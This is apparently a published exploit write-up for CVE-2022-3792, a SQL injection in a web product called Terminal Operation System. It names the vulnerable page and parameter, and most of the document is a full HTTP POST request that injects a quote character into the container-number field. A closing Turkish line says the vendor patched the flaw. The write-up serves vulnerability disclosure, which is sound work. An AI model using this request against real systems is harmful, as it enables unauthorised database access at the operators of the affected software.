Exploit Title: CVE-2022-3792 Terminal Operation System Exploit
Author:Ömer Yılmaz Fordefence.com
Team:Onur Savaş(Vxshellew) – Ömer Akincir(WASP)
CVE-ID: CVE-2022-3792
Vuln Details: SQL Injection
Post parametresi “MainContentTXTContainerNo” Syntax SQL injection Zafiyetli dosya “ContainerWeigherReceiptForGuest.aspx”
HTTP REQUEST
POST /View/Report/ContainerWeigherReceiptForGuest.aspx HTTP/1.1
Content-Length: 7543
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.91 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */*
Referer:
ctl00%24MainContent%24RadScriptManager2=ctl00%24MainContent%24ctl00%24
MainContent%24RadAjaxPanelPanel%7Cctl00%24MainContent%24btnList&ctl00_
MainContent_RadScriptManager2_TSM=&ctl00%24MainContent%24StartDatePicker=2022-12-16&ctl00%24MainContent%24StartDatePicker%24dateInput=16.12.2022&ctl00_
MainContent_StartDatePicker_calendar_SD=%5B%5D&ctl00_
MainContent_StartDatePicker_calendar_AD=%5B%5B1980%2C1%2C1%5D%2C%5B2099%2C12%2C30%5D%2C%5B2022%2C12%2C16%5D%5D&ctl00_
MainContent_StartDatePicker_dateInput_ClientStateD&ctl00_MainContent_StartDatePicker_ClientState=&ctl00%24MainContent%24EndDatePicker=&ctl00%24
MainContent%24EndDatePicker%24dateInput=16.12.2022&ctl00_MainContent_EndDatePicker_calendar_SD=%5D&ctl00_MainContent_EndDatePicker_calendar_AD=%5D&ctl00_
MainContent_EndDatePicker_dateInput_ClientState=&ctl00_MainContent_EndDatePicker_ClientState=&ctl00%24MainContent%24txtContainerno=‘&ctl00_
MainContent_vehicleGrid_ClientState=&__ASYNCPOST=true&RadAJAXControlID=ctl00
Söz konusu zafiyet ilgili firma tarafından hemen kapatılmış ve yeni güncelleme yayımlanmıştır.
